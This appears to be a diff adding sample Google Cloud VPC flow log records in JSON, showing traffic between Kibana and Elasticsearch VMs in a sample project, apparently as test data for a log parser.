+{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"67.43.156.13","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"67.43.156.14","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.14","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"67.43.156.13","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"67.43.156.13","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"67.43.156.13","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"67.43.156.13","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"67.43.156.13","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
+{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985404352
8829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"67.43.156.13","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","s
ubnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"}
,"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
